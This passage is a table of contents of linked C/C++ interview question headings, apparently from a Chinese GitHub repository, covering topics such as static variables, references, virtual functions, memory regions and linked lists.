怎么判断链表中是否有环?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#841%E6%80%8E%E4%B9%88%E5%88%A4%E6%96%AD%E9%93%BE%E8%A1%A8%E4%B8%AD%E6%98%AF%E5%90%A6%E6%9C%89%E7%8E%AF) ##### [19.5.1 static有什么用途?(请至少说明两种)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#842static%E6%9C%89%E4%BB%80%E4%B9%88%E7%94%A8%E9%80%94%E8%AF%B7%E8%87%B3%E5%B0%91%E8%AF%B4%E6%98%8E%E4%B8%A4%E7%A7%8D) ##### [19.5.2 引用与指针有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#843%E5%BC%95%E7%94%A8%E4%B8%8E%E6%8C%87%E9%92%88%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [19.5.3 全局变量和局部变量在内存中是否有区别?如果有,是什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#844%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%92%8C%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E5%9C%A8%E5%86%85%E5%AD%98%E4%B8%AD%E6%98%AF%E5%90%A6%E6%9C%89%E5%8C%BA%E5%88%AB%E5%A6%82%E6%9E%9C%E6%9C%89%E6%98%AF%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [19.5.4 static变量和static 函数各有什么特点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#845static%E5%8F%98%E9%87%8F%E5%92%8Cstatic-%E5%87%BD%E6%95%B0%E5%90%84%E6%9C%89%E4%BB%80%E4%B9%88%E7%89%B9%E7%82%B9) ##### [19.5.5 static全局变量与普通的全局变量有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#846static%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E4%B8%8E%E6%99%AE%E9%80%9A%E7%9A%84%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [19.5.6 static函数与普通函数有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#847static%E5%87%BD%E6%95%B0%E4%B8%8E%E6%99%AE%E9%80%9A%E5%87%BD%E6%95%B0%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [19.5.7 什么是平衡二叉树?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#848%E4%BB%80%E4%B9%88%E6%98%AF%E5%B9%B3%E8%A1%A1%E4%BA%8C%E5%8F%89%E6%A0%91) ##### [19.5.8 什么函数不能声明为虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#849%E4%BB%80%E4%B9%88%E5%87%BD%E6%95%B0%E4%B8%8D%E8%83%BD%E5%A3%B0%E6%98%8E%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0) ##### [19.5.9 写出float x 与“零值”比较的if语句](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#851%E5%86%99%E5%87%BAfloat-x-%E4%B8%8E%E9%9B%B6%E5%80%BC%E6%AF%94%E8%BE%83%E7%9A%84if%E8%AF%AD%E5%8F%A5) ##### [19.6.1 进程间通信的方式有?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#852%E8%BF%9B%E7%A8%8B%E9%97%B4%E9%80%9A%E4%BF%A1%E7%9A%84%E6%96%B9%E5%BC%8F%E6%9C%89) ##### [19.6.2 const 符号常量](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#853const-%E7%AC%A6%E5%8F%B7%E5%B8%B8%E9%87%8F) ##### [19.6.3 c和c++中的struct有什么不同?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#854c%E5%92%8Cc%E4%B8%AD%E7%9A%84struct%E6%9C%89%E4%BB%80%E4%B9%88%E4%B8%8D%E5%90%8C) ##### [19.6.4 纯虚函数如何定义?使用时应注意什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#855%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0%E5%A6%82%E4%BD%95%E5%AE%9A%E4%B9%89%E4%BD%BF%E7%94%A8%E6%97%B6%E5%BA%94%E6%B3%A8%E6%84%8F%E4%BB%80%E4%B9%88) ##### [19.6.5 数组和链表的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#856%E6%95%B0%E7%BB%84%E5%92%8C%E9%93%BE%E8%A1%A8%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [19.6.6 线程与进程的区别和联系? 线程是否具有相同的堆栈? dll是否有独立的堆栈?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#857%E7%BA%BF%E7%A8%8B%E4%B8%8E%E8%BF%9B%E7%A8%8B%E7%9A%84%E5%8C%BA%E5%88%AB%E5%92%8C%E8%81%94%E7%B3%BB-%E7%BA%BF%E7%A8%8B%E6%98%AF%E5%90%A6%E5%85%B7%E6%9C%89%E7%9B%B8%E5%90%8C%E7%9A%84%E5%A0%86%E6%A0%88-dll%E6%98%AF%E5%90%A6%E6%9C%89%E7%8B%AC%E7%AB%8B%E7%9A%84%E5%A0%86%E6%A0%88) ##### [19.6.7 一语句实现x是否为2的若干次幂的判断](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#858%E4%B8%80%E8%AF%AD%E5%8F%A5%E5%AE%9E%E7%8E%B0x%E6%98%AF%E5%90%A6%E4%B8%BA2%E7%9A%84%E8%8B%A5%E5%B9%B2%E6%AC%A1%E5%B9%82%E7%9A%84%E5%88%A4%E6%96%AD) ##### [19.6.8 计算结果题目](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#859%E8%AE%A1%E7%AE%97%E7%BB%93%E6%9E%9C%E9%A2%98%E7%9B%AE) ##### [19.6.9 输出下面程序结果](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#860%E8%BE%93%E5%87%BA%E4%B8%8B%E9%9D%A2%E7%A8%8B%E5%BA%8F%E7%BB%93%E6%9E%9C) ##### [19.7.1 写出程序运行结果](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#861%E5%86%99%E5%87%BA%E7%A8%8B%E5%BA%8F%E8%BF%90%E8%A1%8C%E7%BB%93%E6%9E%9C) ##### [19.7.2 求函数返回值,输入x=9999](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#862%E6%B1%82%E5%87%BD%E6%95%B0%E8%BF%94%E5%9B%9E%E5%80%BC%E8%BE%93%E5%85%A5x9999) ##### [19.7.3 用户输入M,N值,从1至N开始顺序循环数数,每数到M输出该数值,直至全部输出。写出C程序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#863%E7%94%A8%E6%88%B7%E8%BE%93%E5%85%A5mn%E5%80%BC%E4%BB%8E1%E8%87%B3n%E5%BC%80%E5%A7%8B%E9%A1%BA%E5%BA%8F%E5%BE%AA%E7%8E%AF%E6%95%B0%E6%95%B0%E6%AF%8F%E6%95%B0%E5%88%B0m%E8%BE%93%E5%87%BA%E8%AF%A5%E6%95%B0%E5%80%BC%E7%9B%B4%E8%87%B3%E5%85%A8%E9%83%A8%E8%BE%93%E5%87%BA%E5%86%99%E5%87%BAc%E7%A8%8B%E5%BA%8F) ##### [19.7.4 有10亿个浮点数,求出其中最大的10000个 ,用了标准库的,不让用的话,只能自己写堆函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#864%E6%9C%8910%E4%BA%BF%E4%B8%AA%E6%B5%AE%E7%82%B9%E6%95%B0%E6%B1%82%E5%87%BA%E5%85%B6%E4%B8%AD%E6%9C%80%E5%A4%A7%E7%9A%8410000%E4%B8%AA-%E7%94%A8%E4%BA%86%E6%A0%87%E5%87%86%E5%BA%93%E7%9A%84%E4%B8%8D%E8%AE%A9%E7%94%A8%E7%9A%84%E8%AF%9D%E5%8F%AA%E8%83%BD%E8%87%AA%E5%B7%B1%E5%86%99%E5%A0%86%E5%87%BD%E6%95%B0) ##### [19.7.5 在不用第三方参数的情况下,交换两个参数的值 感觉比较:( , bt 而且还是基础题](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#865%E5%9C%A8%E4%B8%8D%E7%94%A8%E7%AC%AC%E4%B8%89%E6%96%B9%E5%8F%82%E6%95%B0%E7%9A%84%E6%83%85%E5%86%B5%E4%B8%8B%E4%BA%A4%E6%8D%A2%E4%B8%A4%E4%B8%AA%E5%8F%82%E6%95%B0%E7%9A%84%E5%80%BC-%E6%84%9F%E8%A7%89%E6%AF%94%E8%BE%83--bt-%E8%80%8C%E4%B8%94%E8%BF%98%E6%98%AF%E5%9F%BA%E7%A1%80%E9%A2%98) ##### [19.7.6 写一段程序,找出数组中第k大小的数,输出数所在的位置](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#866%E5%86%99%E4%B8%80%E6%AE%B5%E7%A8%8B%E5%BA%8F%E6%89%BE%E5%87%BA%E6%95%B0%E7%BB%84%E4%B8%AD%E7%AC%ACk%E5%A4%A7%E5%B0%8F%E7%9A%84%E6%95%B0%E8%BE%93%E5%87%BA%E6%95%B0%E6%89%80%E5%9C%A8%E7%9A%84%E4%BD%8D%E7%BD%AE) ##### [19.7.7 求1000!的未尾有几个0(用素数相乘的方法来做,如72=22233)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#867%E6%B1%821000%E7%9A%84%E6%9C%AA%E5%B0%BE%E6%9C%89%E5%87%A0%E4%B8%AA0%E7%94%A8%E7%B4%A0%E6%95%B0%E7%9B%B8%E4%B9%98%E7%9A%84%E6%96%B9%E6%B3%95%E6%9D%A5%E5%81%9A%E5%A6%827222233) ##### [19.7.8 编程实现:把十进制数(long型)分别以二进制和十六进制形式输出,不能使用printf系列库函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#868%E7%BC%96%E7%A8%8B%E5%AE%9E%E7%8E%B0%E6%8A%8A%E5%8D%81%E8%BF%9B%E5%88%B6%E6%95%B0long%E5%9E%8B%E5%88%86%E5%88%AB%E4%BB%A5%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%92%8C%E5%8D%81%E5%85%AD%E8%BF%9B%E5%88%B6%E5%BD%A2%E5%BC%8F%E8%BE%93%E5%87%BA%E4%B8%8D%E8%83%BD%E4%BD%BF%E7%94%A8printf%E7%B3%BB%E5%88%97%E5%BA%93%E5%87%BD%E6%95%B0) ##### [19.7.9 输入N, 打印 N*N 矩阵](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#869%E8%BE%93%E5%85%A5n-%E6%89%93%E5%8D%B0-nn-%E7%9F%A9%E9%98%B5) ##### [19.8.1 斐波拉契数列递归实现的方法如下](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#870%E6%96%90%E6%B3%A2%E6%8B%89%E5%A5%91%E6%95%B0%E5%88%97%E9%80%92%E5%BD%92%E5%AE%9E%E7%8E%B0%E7%9A%84%E6%96%B9%E6%B3%95%E5%A6%82%E4%B8%8B) ##### [19.8.2 将一个数字字符串转换为数字."1234" -->1234](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#871%E5%B0%86%E4%B8%80%E4%B8%AA%E6%95%B0%E5%AD%97%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%BD%AC%E6%8D%A2%E4%B8%BA%E6%95%B0%E5%AD%971234---1234) ##### [19.8.3 编程实现:把十进制数(long型)分别以二进制和十六进制形式输出,不能使用printf系列库函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#872%E7%BC%96%E7%A8%8B%E5%AE%9E%E7%8E%B0%E6%8A%8A%E5%8D%81%E8%BF%9B%E5%88%B6%E6%95%B0long%E5%9E%8B%E5%88%86%E5%88%AB%E4%BB%A5%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%92%8C%E5%8D%81%E5%85%AD%E8%BF%9B%E5%88%B6%E5%BD%A2%E5%BC%8F%E8%BE%93%E5%87%BA%E4%B8%8D%E8%83%BD%E4%BD%BF%E7%94%A8printf%E7%B3%BB%E5%88%97%E5%BA%93%E5%87%BD%E6%95%B0) ##### [19.8.4 实现任意长度的整数相加或者相乘功能](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#873%E5%AE%9E%E7%8E%B0%E4%BB%BB%E6%84%8F%E9%95%BF%E5%BA%A6%E7%9A%84%E6%95%B4%E6%95%B0%E7%9B%B8%E5%8A%A0%E6%88%96%E8%80%85%E7%9B%B8%E4%B9%98%E5%8A%9F%E8%83%BD) ##### [19.8.5 用递归算法判断数组a[N]是否为一个递增数组](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#874%E7%94%A8%E9%80%92%E5%BD%92%E7%AE%97%E6%B3%95%E5%88%A4%E6%96%AD%E6%95%B0%E7%BB%84an%E6%98%AF%E5%90%A6%E4%B8%BA%E4%B8%80%E4%B8%AA%E9%80%92%E5%A2%9E%E6%95%B0%E7%BB%84) ##### [19.8.6 给两个数组和他们的大小,还有一动态开辟的内存,求交集,把交集放到动态内存dongtai,并且返回交集个数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#876%E7%BB%99%E4%B8%A4%E4%B8%AA%E6%95%B0%E7%BB%84%E5%92%8C%E4%BB%96%E4%BB%AC%E7%9A%84%E5%A4%A7%E5%B0%8F%E8%BF%98%E6%9C%89%E4%B8%80%E5%8A%A8%E6%80%81%E5%BC%80%E8%BE%9F%E7%9A%84%E5%86%85%E5%AD%98%E6%B1%82%E4%BA%A4%E9%9B%86%E6%8A%8A%E4%BA%A4%E9%9B%86%E6%94%BE%E5%88%B0%E5%8A%A8%E6%80%81%E5%86%85%E5%AD%98dongtai%E5%B9%B6%E4%B8%94%E8%BF%94%E5%9B%9E%E4%BA%A4%E9%9B%86%E4%B8%AA%E6%95%B0) ##### [19.8.7 用两个栈实现一个队列的功能?要求给出算法和思路!](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#879%E7%94%A8%E4%B8%A4%E4%B8%AA%E6%A0%88%E5%AE%9E%E7%8E%B0%E4%B8%80%E4%B8%AA%E9%98%9F%E5%88%97%E7%9A%84%E5%8A%9F%E8%83%BD%E8%A6%81%E6%B1%82%E7%BB%99%E5%87%BA%E7%AE%97%E6%B3%95%E5%92%8C%E6%80%9D%E8%B7%AF) ##### [19.8.8 求组合数: 求n个数(1....n)中k个数的组合.... 如:combination(5,3)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#880%E6%B1%82%E7%BB%84%E5%90%88%E6%95%B0-%E6%B1%82n%E4%B8%AA%E6%95%B01n%E4%B8%ADk%E4%B8%AA%E6%95%B0%E7%9A%84%E7%BB%84%E5%90%88-%E5%A6%82combination53) ##### [19.8.9 下面是C语言中两种if语句判断方式。请问哪种写法更好?为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#881%E4%B8%8B%E9%9D%A2%E6%98%AFc%E8%AF%AD%E8%A8%80%E4%B8%AD%E4%B8%A4%E7%A7%8Dif%E8%AF%AD%E5%8F%A5%E5%88%A4%E6%96%AD%E6%96%B9%E5%BC%8F%E8%AF%B7%E9%97%AE%E5%93%AA%E7%A7%8D%E5%86%99%E6%B3%95%E6%9B%B4%E5%A5%BD%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [19.9.1 下面的代码有什么问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#882%E4%B8%8B%E9%9D%A2%E7%9A%84%E4%BB%A3%E7%A0%81%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98) ##### [19.9.2 下面的代码有什么问题?并请给出正确的写法。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#883%E4%B8%8B%E9%9D%A2%E7%9A%84%E4%BB%A3%E7%A0%81%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98%E5%B9%B6%E8%AF%B7%E7%BB%99%E5%87%BA%E6%AD%A3%E7%A1%AE%E7%9A%84%E5%86%99%E6%B3%95) ##### [19.9.3 下面代码有什么错误?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#884%E4%B8%8B%E9%9D%A2%E4%BB%A3%E7%A0%81%E6%9C%89%E4%BB%80%E4%B9%88%E9%94%99%E8%AF%AF) ##### [19.9.4 下面代码有什么问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#885%E4%B8%8B%E9%9D%A2%E4%BB%A3%E7%A0%81%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98) ##### [19.9.5 下面的代码有什么问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#886%E4%B8%8B%E9%9D%A2%E4%BB%A3%E7%A0%81%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98) ##### [19.9.6 下面的代码有什么问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#887%E4%B8%8B%E9%9D%A2%E4%BB%A3%E7%A0%81%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98) ##### [19.9.7 下面的代码有什么问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#888%E4%B8%8B%E9%9D%A2%E4%BB%A3%E7%A0%81%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98) ##### [19.9.8 下面这个程序执行后会有什么错误或者效果](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#889%E4%B8%8B%E9%9D%A2%E8%BF%99%E4%B8%AA%E7%A8%8B%E5%BA%8F%E6%89%A7%E8%A1%8C%E5%90%8E%E4%BC%9A%E6%9C%89%E4%BB%80%E4%B9%88%E9%94%99%E8%AF%AF%E6%88%96%E8%80%85%E6%95%88%E6%9E%9C) ##### [19.9.9 请找出下面代码中的所以错误](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#890%E8%AF%B7%E6%89%BE%E5%87%BA%E4%B8%8B%E9%9D%A2%E4%BB%A3%E7%A0%81%E4%B8%AD%E7%9A%84%E6%89%80%E4%BB%A5%E9%94%99%E8%AF%AF) ##### [20.1.1 请问下面程序有什么错误?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#891%E8%AF%B7%E9%97%AE%E4%B8%8B%E9%9D%A2%E7%A8%8B%E5%BA%8F%E6%9C%89%E4%BB%80%E4%B9%88%E9%94%99%E8%AF%AF) ##### [20.1.2 32位,64位系统中,各种常用内置数据类型占用的字节数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#89232%E4%BD%8D64%E4%BD%8D%E7%B3%BB%E7%BB%9F%E4%B8%AD%E5%90%84%E7%A7%8D%E5%B8%B8%E7%94%A8%E5%86%85%E7%BD%AE%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B%E5%8D%A0%E7%94%A8%E7%9A%84%E5%AD%97%E8%8A%82%E6%95%B0) ##### [20.1.3 悬空指针与野指针区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#893%E6%82%AC%E7%A9%BA%E6%8C%87%E9%92%88%E4%B8%8E%E9%87%8E%E6%8C%87%E9%92%88%E5%8C%BA%E5%88%AB) ##### [20.1.4 vector、map、multimap底层数据结构](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#894vectormapmultimap%E5%BA%95%E5%B1%82%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84) ##### [20.1.5 C++的内存分区](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#895c%E7%9A%84%E5%86%85%E5%AD%98%E5%88%86%E5%8C%BA) ##### [20.1.6 结构与联合有和区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#896%E7%BB%93%E6%9E%84%E4%B8%8E%E8%81%94%E5%90%88%E6%9C%89%E5%92%8C%E5%8C%BA%E5%88%AB) ##### [20.1.7 将“引用”作为函数参数有哪些特点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#897%E5%B0%86%E5%BC%95%E7%94%A8%E4%BD%9C%E4%B8%BA%E5%87%BD%E6%95%B0%E5%8F%82%E6%95%B0%E6%9C%89%E5%93%AA%E4%BA%9B%E7%89%B9%E7%82%B9) ##### [20.1.8 多态,虚函数,纯虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#898%E5%A4%9A%E6%80%81%E8%99%9A%E5%87%BD%E6%95%B0%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [20.1.9 delete与 delete []区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#899delete%E4%B8%8E-delete-%E5%8C%BA%E5%88%AB) ##### [20.2.1 new、delete、malloc、free关系](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#900newdeletemallocfree%E5%85%B3%E7%B3%BB) ##### [20.2.2 链表和数组存储线性表的比较](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#901%E9%93%BE%E8%A1%A8%E5%92%8C%E6%95%B0%E7%BB%84%E5%AD%98%E5%82%A8%E7%BA%BF%E6%80%A7%E8%A1%A8%E7%9A%84%E6%AF%94%E8%BE%83) ##### [20.2.3 C语言中链表的特点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#902c%E8%AF%AD%E8%A8%80%E4%B8%AD%E9%93%BE%E8%A1%A8%E7%9A%84%E7%89%B9%E7%82%B9) ##### [20.2.4 C语言中链表定义及结构](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#903c%E8%AF%AD%E8%A8%80%E4%B8%AD%E9%93%BE%E8%A1%A8%E5%AE%9A%E4%B9%89%E5%8F%8A%E7%BB%93%E6%9E%84) ##### [20.2.5 C++中的临时对象](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#904c%E4%B8%AD%E7%9A%84%E4%B8%B4%E6%97%B6%E5%AF%B9%E8%B1%A1) ##### [20.2.6 C++中的析构函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#905c%E4%B8%AD%E7%9A%84%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0) ##### [20.2.7 C++中对象的构造的顺序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#906c%E4%B8%AD%E5%AF%B9%E8%B1%A1%E7%9A%84%E6%9E%84%E9%80%A0%E7%9A%84%E9%A1%BA%E5%BA%8F) ##### [20.2.8 C++中赋值和初始化的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#907c%E4%B8%AD%E8%B5%8B%E5%80%BC%E5%92%8C%E5%88%9D%E5%A7%8B%E5%8C%96%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [20.2.9 C++类成员的初始化](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#908c%E7%B1%BB%E6%88%90%E5%91%98%E7%9A%84%E5%88%9D%E5%A7%8B%E5%8C%96) ##### [20.3.1 C++什么时候需要进行深拷贝](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#909c%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E9%9C%80%E8%A6%81%E8%BF%9B%E8%A1%8C%E6%B7%B1%E6%8B%B7%E8%B4%9D) ##### [20.3.2 拷贝构造函数的意义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#910%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E7%9A%84%E6%84%8F%E4%B9%89) ##### [20.3.3 C++中对象的声明和定义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#912c%E4%B8%AD%E5%AF%B9%E8%B1%A1%E7%9A%84%E5%A3%B0%E6%98%8E%E5%92%8C%E5%AE%9A%E4%B9%89) ##### [20.3.4 C++中带参数的构造函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#913c%E4%B8%AD%E5%B8%A6%E5%8F%82%E6%95%B0%E7%9A%84%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [20.3.5 C++中的构造函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#914c%E4%B8%AD%E7%9A%84%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [20.3.6 C++对象初始化](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#915c%E5%AF%B9%E8%B1%A1%E5%88%9D%E5%A7%8B%E5%8C%96) ##### [20.3.7 C++面向对象的意义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#917c%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1%E7%9A%84%E6%84%8F%E4%B9%89) ##### [20.3.8 C++中类之间的基本关系](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#918c%E4%B8%AD%E7%B1%BB%E4%B9%8B%E9%97%B4%E7%9A%84%E5%9F%BA%E6%9C%AC%E5%85%B3%E7%B3%BB) ##### [20.3.9 C++中类成员的作用域](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#919c%E4%B8%AD%E7%B1%BB%E6%88%90%E5%91%98%E7%9A%84%E4%BD%9C%E7%94%A8%E5%9F%9F) ##### [20.4.1 C++中类的关键字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#920c%E4%B8%AD%E7%B1%BB%E7%9A%84%E5%85%B3%E9%94%AE%E5%AD%97) ##### [20.4.2 C++中类声明和实现的分离](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#921c%E4%B8%AD%E7%B1%BB%E5%A3%B0%E6%98%8E%E5%92%8C%E5%AE%9E%E7%8E%B0%E7%9A%84%E5%88%86%E7%A6%BB) ##### [20.4.3 C++中的命名空间](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#922c%E4%B8%AD%E7%9A%84%E5%91%BD%E5%90%8D%E7%A9%BA%E9%97%B4) ##### [20.4.4 C和C++相互调用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#923c%E5%92%8Cc%E7%9B%B8%E4%BA%92%E8%B0%83%E7%94%A8) ##### [20.4.5 函数重载的定义、条件、注意事项](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#924%E5%87%BD%E6%95%B0%E9%87%8D%E8%BD%BD%E7%9A%84%E5%AE%9A%E4%B9%89%E6%9D%A1%E4%BB%B6%E6%B3%A8%E6%84%8F%E4%BA%8B%E9%A1%B9) ##### [20.4.6 C++中 inline 内联编译的限制](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#925c%E4%B8%AD-inline-%E5%86%85%E8%81%94%E7%BC%96%E8%AF%91%E7%9A%84%E9%99%90%E5%88%B6) ##### [20.4.7 内联函数的定义和特点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#926%E5%86%85%E8%81%94%E5%87%BD%E6%95%B0%E7%9A%84%E5%AE%9A%E4%B9%89%E5%92%8C%E7%89%B9%E7%82%B9) ##### [20.4.8 C++引用的意义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#927c%E5%BC%95%E7%94%A8%E7%9A%84%E6%84%8F%E4%B9%89) ##### [20.4.9 C++引用的本质](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#928c%E5%BC%95%E7%94%A8%E7%9A%84%E6%9C%AC%E8%B4%A8) ##### [20.5.1 C++中特殊的引用--const引用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#929c%E4%B8%AD%E7%89%B9%E6%AE%8A%E7%9A%84%E5%BC%95%E7%94%A8--const%E5%BC%95%E7%94%A8) ##### [20.5.2 C 到 C++ 的升级](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#930c-%E5%88%B0-c-%E7%9A%84%E5%8D%87%E7%BA%A7%E8%87%B3%E5%B0%91%E5%88%97%E5%87%BA%E4%B8%89%E7%82%B9) ##### [20.5.3 C和C++语言中的三目运算符](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#931c%E5%92%8Cc%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E4%B8%89%E7%9B%AE%E8%BF%90%E7%AE%97%E7%AC%A6) ##### [20.5.4 宏的局限和妙用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#932%E5%AE%8F%E7%9A%84%E5%B1%80%E9%99%90%E5%92%8C%E5%A6%99%E7%94%A8) ##### [20.5.5 C 语言中的顺序点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#933c-%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E9%A1%BA%E5%BA%8F%E7%82%B9) ##### [20.5.6 C/C++语言中的函数参数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#934cc%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E5%87%BD%E6%95%B0%E5%8F%82%E6%95%B0) ##### [20.5.7 声明和定义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#935%E5%A3%B0%E6%98%8E%E5%92%8C%E5%AE%9A%E4%B9%89) ##### [20.5.8 C/C++语言中内存操作的交通规则](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#936cc%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%86%85%E5%AD%98%E6%93%8D%E4%BD%9C%E7%9A%84%E4%BA%A4%E9%80%9A%E8%A7%84%E5%88%99) ##### [20.5.9 C/C++语言中常见的内存错误](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#937cc%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%B8%B8%E8%A7%81%E7%9A%84%E5%86%85%E5%AD%98%E9%94%99%E8%AF%AF) ##### [20.6.1 内存操作的基本原则](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#938%E5%86%85%E5%AD%98%E6%93%8D%E4%BD%9C%E7%9A%84%E5%9F%BA%E6%9C%AC%E5%8E%9F%E5%88%99) ##### [20.6.2 